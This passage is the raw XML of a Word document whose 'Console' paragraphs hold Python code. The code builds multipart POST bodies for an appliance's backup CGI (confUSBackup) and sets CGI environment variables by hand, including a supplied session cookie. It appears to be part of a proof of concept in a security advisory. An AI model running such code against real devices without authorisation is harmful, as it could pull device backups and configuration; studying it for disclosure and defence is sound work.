          <w:p w14:paraId="40A8D171" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    """Handles backup creation via CGI POST Calls"""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2777C4E1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38C8A3A3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    boundary1 = "-----------------------------" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_random_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="043A6B07" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string.digits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, 29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5028919B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F66CBA3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="659F0E5E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    post_data1 = (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F72A68" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        "\r\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>n</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22228DBB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22A41062" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B154417" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>disableFirmwareBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49E1DA95" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788B50C1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "Exclude Firmware in Backup",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13A5F906" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="614F06DC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="MAX_FILE_SIZE"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FC72227" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05761228" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "800000000",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DA32FCC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="186D5F7B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uploadFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"; filename=""',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36F4B844" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "Content-Type: application/octet-stream",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="654DE696" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7893F92E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FCB611B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18592B58" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>actionStep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FE07CFA" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52274A87" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>actionStep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4862F05D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0}--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16ABF907" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7D41D4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06535C61" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>).format</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(boundary1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="470B9A1A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2323BF5F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    boundary2 = "-----------------------------" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>create_random_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2D7176E1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>string.digits</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, 29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EA67A2" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F96A025" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="308A93AB" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    post_data2 = (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4FD3FF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        "\r\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>n</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>".join</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4484C56A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            [</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34963CF0" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02AC9D55" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="MAX_FILE_SIZE"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331C66B3" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="639CA9EF" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "800000000",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C301C8E" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC42830" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>createBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C46808B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37BE3CCC" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "Create Backup",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182F31F5" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="659C414B" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uploadFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"; filename=""',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3681CA6A" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "Content-Type: application/octet-stream",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3F1B20" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C007392" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="085E4C75" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{0}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24A7E29F" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                'Content-Disposition: form-data; name="</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>actionStep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57ADB77D" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E652C6C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>actionStep</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A66084C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">                "{</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>0}--</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47591603" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            ]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAE5917" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9CA5B1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>).format</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>(boundary2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A8D4513" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="189FD893" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["GATEWAY_INTERFACE"] = "CGI/1.1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47443DD1" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REQUEST_METHOD"] = "POST"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20046088" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>[</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F80092" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        "HTTP_USER_AGENT"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F3ABF99" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ] = "Mozilla/5.0 (X11; Linux x86_64) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>AppleWebKit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD53343" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">["REMOTE_ADDR"] = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6D1C73A5" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["HTTP_COOKIE"] = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">=" + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sessionid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="778D66C4" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["SCRIPT_NAME"] = "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06AC67B7" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REDIRECT_STATUS"] = "1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F138A5C" w14:textId="77777777" w:rsidR="00D61684" w:rsidRDefault="00D61684" w:rsidP="00D61684">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>os.environ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>["REQUEST_URI"] = "/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cgi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>-bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>utilserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>confUSBackup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>w_confUSBackup</w:t>
            </w:r>
